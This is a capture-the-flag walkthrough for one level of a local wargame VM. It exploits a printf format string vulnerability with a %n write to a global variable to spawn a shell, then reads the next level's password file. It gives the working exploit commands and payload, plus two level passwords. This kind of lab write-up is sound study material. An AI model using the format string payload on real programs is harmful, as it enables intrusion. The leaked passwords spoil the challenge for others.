1. Download the binary from the server:
   scp -P 2222 level3@localhost:~/level3 .
   Password: 492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02

2. Analyze the binary with Ghidra:
   - printf(buffer) without format specifier (format string vulnerability)
   - Global variable 'm' must equal 0x40 (64) to spawn shell
   - Address of 'm': 0x0804988c

3. Connect to the VM via SSH:
   ssh level3@localhost -p 2222
   Password: 492deb0e7d14c4b5695173cca843c4384fe52d0857c2b0718e1a521a4d33ec02

4. Find the stack position of your input:
   python -c 'print "AAAA" + "%x."*10' | ./level3
   Look for 41414141 -> Position 4

5. Calculate the payload:
   - Address of 'm': \x8c\x98\x04\x08 (4 bytes)
   - Padding: %60x (60 characters)
   - Total: 64 bytes (0x40)
   - Write using: %4$n (4th position)

6. Execute the exploit:
   (python -c 'print "\x8c\x98\x04\x08" + "%60x%4$n"'; cat) | ./level3

7. Read the password:
   cat /home/user/level4/.pass

8. Password: b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa

9. Exit and login as level4:
   su level4
